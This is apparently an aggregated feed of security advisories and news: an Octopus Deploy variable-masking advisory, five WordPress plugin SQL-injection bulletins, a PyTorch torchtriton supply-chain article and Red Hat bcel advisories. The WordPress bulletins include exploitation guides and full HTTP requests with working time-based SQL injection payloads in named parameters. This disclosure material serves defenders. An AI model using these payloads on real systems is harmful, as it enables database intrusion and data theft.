In affected versions of Octopus Deploy it is possible for certain types of sensitive variables to inadvertently become unmasked when viewed in variable preview.

Summary

Certain types of sensitive variables may be displayed as plain text in variable preview (CVE-2022-3460)

Advisory Number

2022-25

Discovery Date

10 Oct 2022

Patch Release Date

14 Nov 2022

Advisory Release Date

21 Dec 2022

Product

Octopus Server

Operating System

Linux and Microsoft Windows

Severity

Medium

CVE ID

CVE-2022-3460

Customers who have downloaded and installed any of the Octopus Server versions listed below ("Details") are affected.

Please upgrade your Octopus Server immediately to fix this vulnerability.

Customers who have upgraded Octopus Server to version 2022.3.10863 or higher are not affected.

**Severity**

Octopus Deploy has given this vulnerability a medium rating. This rating was given according to the Octopus Deploy severity levels, which ranks vulnerabilities as critical, high, medium, or low severity.

This is our assessment and you should evaluate its applicability to your own environment.

**Details**

In affected versions of Octopus Deploy it is possible for certain types of sensitive variables to inadvertently become unmasked when viewed in variable preview.

The versions of Octopus Server affected by this vulnerability are:

*   All 2018.x versions after 2018.3
*   All 2019.x, 2020.x and 2021.x versions
*   All 2022.1.x versions
*   All 2022.2.x versions before 2022.2.8552
*   All 2022.3.x versions before 2022.3.10750
*   All 2022.4.x versions before 2022.4.8221

As of the 27/09/2022 Octopus Server version 2022.4.x is only available on Octopus Cloud.

**Fix**

To address this vulnerability, we have released Octopus Server version:

*   2022.2.8552
*   2022.3.10750
*   2022.4.8221

The latest versions of Octopus Deploy products can be downloaded from https://octopus.com/downloads and previous versions can be downloaded from https://octopus.com/downloads/previous

**What You Need to Do**

Octopus Deploy recommends that you upgrade to the latest version (2022.3.10863). You can download the latest version of Octopus Server from https://octopus.com/downloads

**If you can't upgrade to the latest version (2022.3.10863):**

If you have feature version...

...then upgrade to this version

2018.3 and greater

2022.2.8552 or greater

2019.x, 2020.x, 2021.x and 2022.1.x

2022.2.8552 or greater

2022.2.x

2022.2.8552 or greater

2022.3.x

2022.3.10750 or greater

2022.4.x

2022.4.8221 or greater

**Mitigation**

There is no known mitigation for CVE-2022-3460, it is important to upgrade to a fixed version as soon as possible.

**Support**

If you have any questions or concerns regarding this advisory, please contact our support team https://octopus.com/support.

**Exploitation and Public Announcements**

The Octopus Deploy security team is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory.

**Source**

This vulnerability was reported by an Octopus Deploy customer.

CVE-2022-3460: Security Advisory 2022-25

The WP RSS By Publishers WordPress plugin through 0.1 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin

**wp-rss-by-publishers (1/3) WordPress plugin SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 09 2022

Affected Software

wp-rss-by-publishers

Affected Software Type

WordPress plugin

Version

0.1

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4360

CVSS 3.x Base Score

n/a

CVSS 2.0 Base Score

n/a

Reporter

Daniel Krohmer, Kunal Sharma

Reporter Contact

daniel.krohmer@iese.fraunhofer.de

Link to Affected Software

https://wordpress.org/plugins/wp-rss-by-publishers

Link to Vulnerability DB

https://nvd.nist.gov/vuln/detail/CVE-2022-4360

**Vulnerability Description**

The wsysadmin_publishers page of the wp-rss-by-publishers 0.1 WordPress plugin is vulnerable to SQL injection. An authenticated attacker may abuse the id parameter and craft a malicious GET request with arbitrary SQL commands.

**Exploitation Guide**

**This exploit was tested with WordPress 4.2, since the plugin is not working on recent WordPress versions anymore.**

Various tables required for the plugin to work are not created, probably due to bugs. As a workaround, the tables may be created manually in the SQL database:

    CREATE TABLE wsys_publisher (id int not null, name varchar(255) not null, description varchar (255) not null, url varchar (255) not null, status int not null, api_key varchar (255) not null, image_1 varchar (255) not null, image_2 varchar (255)  not null, image_3 varchar (255) not null, feed_count int not null, post_count int not null, published_post_count int not null, hidden_post_count int not null, pending_post_count int not null, created_at varchar (255) not null, author_id int not null);
    
    CREATE TABLE wsys_feed (id int not null, publisher_id int not null, name varchar(255) not null, url varchar (255) not null, plugin int not null, status int not null, post_count int not null, published_post_count int not null, hidden_post_count int not null, pending_post_count int not null, created_at varchar (255) not null, last_fetch varchar(255) not null, last_modified varchar(255) not null);
    
    CREATE TABLE wsys_rule (id int not null, feed_id int not null, tags varchar(255) not null, categories varchar(255) not null, publisher_id int not null);
    

Login as admin user. This attack requires at least admin privileges.

Add a new publisher and provide values for Name, URL, and Description. Ensure that the URL points to a valid RSS feed. Subsequently, hit Save.

Clicking the previous button triggers the vulnerable request. id is the vulnerable query parameter.

An exploit may look like the following:

In the code, the vulnerability is triggered by unsanitized user input of the id query parameter at line 800 in ./wp-rss-by-publisher.php.

The final database query is executed at line 76 in ./classes/wsys-db.class.php:

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

The SQL injection can be triggered by sending the request below.

    GET /wp-admin/admin.php?page=wsysadmin_publishers&action=delete&id=0,1)+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost/wp-admin/admin.php?page=wsysadmin_publishers
    Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1669822033%7ClJinzM5K7qiPG9We9REfsgUZcV6TUIAC4NMprJr6Kxh%7Cf3eea559c158e99ec2d37d673775cdbcbfc3d93c0664c89f6388b08014c281fa; slt=87e6b56f-e72c-4f81-8246-c2348e20528b.1; wp-settings-time-1=1668871056; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do; XDEBUG_SESSION=netbeans-xdebug; PHPSESSID=0af4269367419c0bbf6d231a32ee61e8; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1669822033%7ClJinzM5K7qiPG9We9REfsgUZcV6TUIAC4NMprJr6Kxh%7C252785010049c4ba6fa37a51a0ec52168de6bef203fffb7cf657ba749b7a5a81
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1

CVE-2022-4360: Security Bulletin

The multimedial images WordPress plugin through 1.0b does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as Admin.

**multimedial-images 1.0b WordPress plugin SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 12 2022

Affected Software

multimedial-images

Affected Software Type

WordPress plugin

Version

1.0b

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4370

CVSS 3.x Base Score

n/a

CVSS 2.0 Base Score

n/a

Reporter

Daniel Krohmer, Kunal Sharma

Reporter Contact

daniel.krohmer@iese.fraunhofer.de

Link to Affected Software

https://wordpress.org/plugins/multimedial-images/

Link to Vulnerability DB

https://nvd.nist.gov/vuln/detail/CVE-2022-4370

**Vulnerability Description**

The id query parameter in multimedial-images 1.0b is vulnerable to SQL injection. An authenticated attacker may abuse the mmi page of the plugin to craft a malicious GET request.

**Exploitation Guide**

**This exploit was tested with WordPress 4.2, since the plugin is not working on recent WordPress versions anymore.**

Login as admin user. This attack requires at least admin privileges.

Go to the Settings and then select Multimedial Images.

Uploade an image.

Select an arbitrary image file...

... and Save all changes.

Since the plugin is very buggy, you may need to insert the image path manually by clicking on Media Library...

... and Show...

... and Insert Into Post.

Save the image.

Next, click on Remove.

Clicking the previous button triggers the vulnerable request. id is the vulnerable query parameter.

A POC may look like the following request:

In the code, the vulnerability is triggered by unsanitized user input of id at line 100 in ./ultimedial_imagenes.php.

The final database query is called within the del_background function at line 90 in file ./multimedial_imagenes.php.

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

The SQL injection can be triggered by sending the request below.

    GET /wp-admin/options-general.php?page=mmi&a=delbg&id=33+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA) HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost/wp-admin/options-general.php?page=mmi
    Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1669457141%7CotH5c3MDrzK14OdNWXfLTBa1DY9ZllG9GuO3ruqHmCl%7C2fc3d70e2428acf2c33516d5f3ead10f94aef8a67512d1c7370221f22ad3cb1b; slt=87e6b56f-e72c-4f81-8246-c2348e20528b.1; wp-settings-time-1=1668871056; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1669457141%7CotH5c3MDrzK14OdNWXfLTBa1DY9ZllG9GuO3ruqHmCl%7C05889dde6e9a628b548d320f2834c1f11e68f1b629705454db0cbf55bf0f5a63
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1

CVE-2022-4370: Security Bulletin

The Web Invoice WordPress plugin through 2.1.3 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL Injection exploitable by high privilege users such as admin by default. However, depending on the plugin configuration, other users, such as subscriber could exploit this as well

**web-invoice 2.1.3 (2/2) WordPress plugin SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 12 2022

Affected Software

web-invoice

Affected Software Type

WordPress plugin

Version

2.1.3

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4372

CVSS 3.x Base Score

n/a

CVSS 2.0 Base Score

n/a

Reporter

Daniel Krohmer, Kunal Sharma

Reporter Contact

daniel.krohmer@iese.fraunhofer.de

Link to Affected Software

https://wordpress.org/plugins/web-invoice

Link to Vulnerability DB

https://nvd.nist.gov/vuln/detail/CVE-2022-4372

**Vulnerability Description**

The multiple_invoices[] query array parameter in web-invoice 2.1.3 is vulnerable to to SQL injection. An authenticated attacker may abuse the new_web_invoice page of the plugin to craft a malicious GET request. Depending on the plugin settings, this attack may impact any user role (subscriber or higher).

**Exploitation Guide**

**This exploit was tested with WordPress 4.2, since the plugin is not working on recent WordPress versions anymore.**

In the plugin settings, any user role can be assigned to invoice management. In this example, we use a low-privilege Subscriber role.

Create a new invoice for an arbitrary user:

Fill out the form and submit the invoice by clicking on Save and Preview:

Go to the invoice overview by clicking on Web Invoice, then click on the subject that has just been created.

Scroll down and hit Clear Log:

Clicking the previous button triggers the vulnerable request. multiple_invoices[] is the vulnerable query parameter

A POC may look like the following request:

In the code, the vulnerability is triggered by unsanitized user input of multiple_invoices[] at line 42 in ./Flow.php.

In ./Functions.php at line 75, the parameter is passed to the function web_invoice_show_message.

In this function, the malicious database is crafted at line 503 of ./Functions.php

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

The SQL injection can be triggered by sending the request below.

    GET /wp-admin/admin.php?page=new_web_invoice&multiple_invoices[]=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&multiple_invoices[]=31618572+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA)&web_invoice_action=clear_log HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost/wp-admin/admin.php?page=new_web_invoice&web_invoice_action=doInvoice&invoice_id=31618572
    Cookie: wordpress_86a9106ae65537651a8e456835b316ab=subscriber%7C1669997060%7CQdxLUgq9Wz8z38XxdX2XGFlZGfCPfJ749H8TSkI3bVk%7C4d290f74d0fdee6ed52774b0827884c4a4ac8f0515fbe0c2ccd89c9093b52f90; wplrp_subscriber_id=6; wp_woocommerce_session_86a9106ae65537651a8e456835b316ab=1%7C%7C1669972640%7C%7C1669969040%7C%7C4e12cab99480b80c0ee581a6517239e4; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do; wp-settings-time-1=1669802217; wp-settings-time-2=1669824525; XDEBUG_SESSION=netbeans-xdebug; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=subscriber%7C1669997060%7CQdxLUgq9Wz8z38XxdX2XGFlZGfCPfJ749H8TSkI3bVk%7C7264237c5bb535f6d1e5efa1bf3cb1db26c41b5a279f134aa8004c585e6e0ee7
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origi
    Sec-Fetch-User: ?1

CVE-2022-4372: Security Bulletin

**wp-rss-by-publishers (2/3) WordPress plugin SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 09 2022

Affected Software

wp-rss-by-publishers

Affected Software Type

WordPress plugin

Version

0.1

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4359

CVSS 3.x Base Score

n/a

CVSS 2.0 Base Score

n/a

Reporter

Daniel Krohmer, Kunal Sharma

Reporter Contact

daniel.krohmer@iese.fraunhofer.de

Link to Affected Software

https://wordpress.org/plugins/wp-rss-by-publishers

Link to Vulnerability DB

https://nvd.nist.gov/vuln/detail/CVE-2022-4359

**Vulnerability Description**

The wsysadmin_feeds page of the wp-rss-by-publishers 0.1 WordPress plugin is vulnerable to SQL injection. An authenticated attacker may abuse the id parameter and craft a malicious GET request with arbitrary SQL commands.

**Exploitation Guide**

**This exploit was tested with WordPress 4.2, since the plugin is not working on recent WordPress versions anymore.**

Various tables required for the plugin to work are not created, probably due to bugs. As a workaround, the tables may be created manually in the SQL database:

    CREATE TABLE wsys_publisher (id int not null, name varchar(255) not null, description varchar (255) not null, url varchar (255) not null, status int not null, api_key varchar (255) not null, image_1 varchar (255) not null, image_2 varchar (255)  not null, image_3 varchar (255) not null, feed_count int not null, post_count int not null, published_post_count int not null, hidden_post_count int not null, pending_post_count int not null, created_at varchar (255) not null, author_id int not null);
    
    CREATE TABLE wsys_feed (id int not null, publisher_id int not null, name varchar(255) not null, url varchar (255) not null, plugin int not null, status int not null, post_count int not null, published_post_count int not null, hidden_post_count int not null, pending_post_count int not null, created_at varchar (255) not null, last_fetch varchar(255) not null, last_modified varchar(255) not null);
    
    CREATE TABLE wsys_rule (id int not null, feed_id int not null, tags varchar(255) not null, categories varchar(255) not null, publisher_id int not null);
    

Login as admin user. This attack requires at least admin privileges.

Add a new publisher and provide values for Name, URL, and Description. Ensure that the URL points to a valid RSS feed. Subsequently, hit Save.

Hover over the name of the publisher that has been created and select Edit.

Clicking the previous button triggers the following request:

However, for the vulnerable request, some modifications are necessary: The wsysadmin_publishers page needs to be changed to wsysadmin_feeds. Then, id is the vulnerable query parameter:

An exploit may look like the following:

In the code, the update_feeds function handles different page inputs, in this case wsysadmin_feeds at line 817 in ./wp-rss-by-publisher.php.

In case the action is set to delete and id holds a value, the WSYS_Feed::delete method is called, again passing the vulnerable id parameter at line 887 in ./wp-rss-by-publisher.php.

The final database query is called at line 76 in ./classes/wsys-db.class.php.

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

The SQL injection can be triggered by sending the request below.

    GET /wp-admin/admin.php?page=wsysadmin_feeds&action=delete&id=0,1)+AND+(SELECT+5926+FROM+(SELECT(SLEEP(5)))erUA HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Connection: close
    Referer: http://localhost/wp-admin/admin.php?page=wsysadmin_publishers
    Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1669822033%7ClJinzM5K7qiPG9We9REfsgUZcV6TUIAC4NMprJr6Kxh%7Cf3eea559c158e99ec2d37d673775cdbcbfc3d93c0664c89f6388b08014c281fa; slt=87e6b56f-e72c-4f81-8246-c2348e20528b.1; wp-settings-time-1=1668871056; wp-settings-1=libraryContent%3Dbrowse%26mfold%3Do; XDEBUG_SESSION=netbeans-xdebug; PHPSESSID=0af4269367419c0bbf6d231a32ee61e8; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1669822033%7ClJinzM5K7qiPG9We9REfsgUZcV6TUIAC4NMprJr6Kxh%7C252785010049c4ba6fa37a51a0ec52168de6bef203fffb7cf657ba749b7a5a81
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1

CVE-2022-4359: Security Bulletin

The Qe SEO Handyman WordPress plugin through 1.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin

**qe-seo-handyman 1.0 (2/2) WordPress plugin SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 08 2022

Affected Software

qe-seo-handyman

Affected Software Type

WordPress plugin

Version

1.0

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4352

CVSS 3.x Base Score

n/a

CVSS 2.0 Base Score

n/a

Reporter

Daniel Krohmer, Kunal Sharma

Reporter Contact

daniel.krohmer@iese.fraunhofer.de

Link to Affected Software

https://wordpress.org/plugins/qe-seo-handyman

Link to Vulnerability DB

https://nvd.nist.gov/vuln/detail/CVE-2022-4352

**Vulnerability Description**

The import_meta action in qe-seo-handyman 1.0 is vulnerable to SQL injection. An authenticated attacker may abuse the CSV file upload functionality to craft a malicious POST request.

**Exploitation Guide**

Login as admin user. This attack requires at least admin privileges.

The plugin requires all-in-one-seo-pack to be activated.

Head to Qe SEO handy-man.

Click on the link at Step 3 to import a CSV file:

Click on Browse... and select a valid CSV file.

A sample CSV file may look like the following:

    post_id,url,post_title,wpseo_title,wpseo_metadesc,type,term_taxonomy_id
    5,http://localhost/?taxonomy=bp-email-type&term=activity-at-message,activity-at-message,test,test,bp-email-type,5
    

Then, click Submit:

After uploading, hit Continue.

Clicking the previous button triggers the vulnerable request. The post_id[] array is the vulnerable parameter:

A request may look like the following:

In the code, the vulnerable $post_id variable is written at line 90 in ./inc/QE-Seo-handyman-import-csv.php.

The final database query is executed at line 128 of the same file.

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

The SQL injection can be triggered by sending the request below.

    POST /wp-admin/admin-post.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/wp-admin/admin.php?page=qe-seo-handyman&tab=import
    Content-Type: multipart/form-data; boundary=---------------------------8468852133354988763032646215
    Content-Length: 1377
    Origin: http://localhost
    Connection: close
    Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1666354651%7C5hcpdLYnfCYlULiNoxvsLbX15Xk3355i128JO4Rpaec%7C9052465964755f7df388ca7ded12dea9ba2a5fbb3515169d1c4e2f2792cafad2; wp_woocommerce_session_86a9106ae65537651a8e456835b316ab=1%7C%7C1666351832%7C%7C1666348232%7C%7Cc2cb50590cfa7e94229c1621767b0523; wp-settings-1=editor%3Dtinymce%26ampamphidetb%3D1%26ampampmfold%3Do%26mfold%3Do; wp-settings-time-1=1666181852; XDEBUG_SESSION=netbeans-xdebug; wordpress_test_cookie=WP%20Cookie%20check; tk_ai=woo%3AxIFtmbzi40NKIXvwVmH3Vwly; woocommerce_items_in_cart=1; woocommerce_cart_hash=0ed611221b3d80f0fa539cbbda99650c; wp_lang=en_US; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1666354651%7C5hcpdLYnfCYlULiNoxvsLbX15Xk3355i128JO4Rpaec%7Cc6b068ebe7c94a69ba9c603924cf21ddd8463427f2fea34e380736f338a7a6d5
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="action"
    
    import_meta
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="nonce"
    
    62bfc7851f
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="wpseo_title[]"
    
    test
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="wpseo_desc[]"
    
    test
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="term_id[]"
    
    5
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="permalink[]"
    
    http://localhost/?taxonomy=bp-email-type&term=activity-at-message
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="taxonomy[]"
    
    bp-email-type
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="wpseo_focuskw[]"
    
    activity-at-message
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="post_id[]"
    
    5 AND (SELECT 3477 FROM (SELECT(SLEEP(5)))DhVP)
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="submit"
    
    Submit
    -----------------------------8468852133354988763032646215--

CVE-2022-4352: Security Bulletin

The maintainers of the PyTorch package have warned users who have installed the nightly builds of the library between December 25, 2022, and December 30, 2022, to uninstall and download the latest versions following a dependency confusion attack.
"PyTorch-nightly Linux packages installed via pip during that time installed a dependency, torchtriton, which was compromised on the Python Package

Supply Chain / Machine Learning

The maintainers of the PyTorch package have warned users who have installed the nightly builds of the library between December 25, 2022, and December 30, 2022, to uninstall and download the latest versions following a dependency confusion attack.

"PyTorch-nightly Linux packages installed via pip during that time installed a dependency, **torchtriton**, which was compromised on the Python Package Index (PyPI) code repository and ran a malicious binary," the PyTorch team said in an alert over the weekend.

PyTorch, analogous to Keras and TensorFlow, is an open source Python-based machine learning framework that was originally developed by Meta Platforms.

The PyTorch team said that it became aware of the malicious dependency on December 30, 4:40 p.m. GMT. The supply chain attack entailed uploading a malicious version of a legitimate dependency named torchtriton to the Python Package Index (PyPI) code repository.

Since package managers like pip check public code registries such as PyPI for a package before private registries, it allowed the fraudulent module to be installed on users' systems as opposed to the actual version pulled from the third-party index.

The rogue version, for its part, is engineered to exfiltrate system information, including environment variables, the current working directory, and host name, in addition to accessing the following files -

*   /etc/hosts
*   /etc/passwd
*   The first 1,000 files in $HOME/\*
*   $HOME/.gitconfig
*   $HOME/.ssh/\*

In a statement shared with Bleeping Computer, the owner of the domain to which the stolen data was transmitted claimed it was part of an ethical research exercise and that all the data has since been deleted.

As mitigations, torchtriton has been removed as a dependency and replaced with pytorch-triton. A dummy package has also been registered on PyPI as a placeholder to prevent further abuse.

"This is not the real torchtriton package but uploaded here to discover dependency confusion vulnerabilities," reads a message on the PyPI page for torchtriton. "You can get the real torchtriton from https://download.pytorch\[.\]org/whl/nightly/torchtriton/."

The development also comes as JFrog disclosed details of another package known as cookiezlog that has been observed utilizing anti-debugging techniques to resist analysis, marking the first time such mechanisms have been incorporated in PyPI malware.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

PyTorch Machine Learning Framework Compromised with Malicious Dependency

Red Hat Security Advisory 2023-0005-01 - The Byte Code Engineering Library is intended to give users a convenient way to analyze, create, and manipulate Java class files.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: bcel security update  
Advisory ID:       RHSA-2023:0005-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0005  
Issue date:        2023-01-02  
CVE Names:         CVE-2022-42920  
====================================================================  
1. Summary:

An update for bcel is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - noarch

3. Description:

The Byte Code Engineering Library (Apache Commons BCEL) is intended to give  
users a convenient way to analyze, create, and manipulate (binary) Java  
class files (those ending with .class).

Security Fix(es):

* Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds  
writing (CVE-2022-42920)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2142707 - CVE-2022-42920 Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
bcel-6.4.1-9.el9_1.src.rpm

noarch:  
bcel-6.4.1-9.el9_1.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42920  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7KzLtzjgjWX9erEAQi1RxAAjOBWF4SlAzB+rMSa0jprRya01ZR1l47y  
717QoQX9htFZAt/rT0+ra8x612EJFAczDbducY5QykcjMdsq2b7N2hKscevc6xYr  
IsXJGTzNwfMAGMs6R1WSiGhAQA9Fop6s/+A9noGR67IWCmp3ugEs/YyZEPxb6cZr  
oxGgp2ClWpuUoZ0MUyhoW8gJx01DZi8jgcUzE8+mfGEFSBIsjIvJ6jQpFTmSAAwe  
iz6kN24ANeO9FLtGtEZmVdhwwaowIONU4TvVQ0V68Abeipxqou9GhoCFDLfI4gRa  
JhgfpYrRPTQckfTZGemN+1P6L3FgMZztIzoa8V3zEwhw8UG4Ofslm/aMPV8KZukq  
XDrRNQgP9BXFr0ccJpF1v62q3hgQmX4oZBkpjujfeZD1KGYl5IVmOJH3Ry/FJUui  
f9WXKJlW7Jw1L9bO6S8vIvPtkbgwAZIjuFhm96uSqhCu7Qlr82t2hNRCH6d5X0EW  
2pwJmhn0o+7I3DUgogmWbRh/qEBIByZWtZP3PTU9Fh3f8Bf+6lnLwwgEzB2sbNDO  
RaybVJmHp1O5XpfCGNV7H/dGh7sAN/nzyEjzF1oB/QA1dbDkiudQCczx4wvtxpFu  
KpyF8N+R8Xn1VASx+X7LEbfaQAnVATutFUnYp39gT7PgEBDTt3pPH9l2l/wNhSJM  
tE7d9mkqkrs=gsMH  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0005-01

Red Hat Security Advisory 2023-0004-01 - The Byte Code Engineering Library is intended to give users a convenient way to analyze, create, and manipulate Java class files.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: bcel security update  
Advisory ID:       RHSA-2023:0004-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0004  
Issue date:        2023-01-02  
CVE Names:         CVE-2022-42920  
====================================================================  
1. Summary:

An update for bcel is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream EUS (v.9.0) - noarch

3. Description:

The Byte Code Engineering Library (Apache Commons BCEL) is intended to give  
users a convenient way to analyze, create, and manipulate (binary) Java  
class files (those ending with .class).

Security Fix(es):

* Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds  
writing (CVE-2022-42920)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2142707 - CVE-2022-42920 Apache-Commons-BCEL: arbitrary bytecode produced via out-of-bounds writing

6. Package List:

Red Hat Enterprise Linux AppStream EUS (v.9.0):

Source:  
bcel-6.4.1-9.el9_0.src.rpm

noarch:  
bcel-6.4.1-9.el9_0.noarch.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42920  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY7KzMdzjgjWX9erEAQhNnA/6Aj0dFqQToL48z8urkAHu9cjbjtXe8WY4  
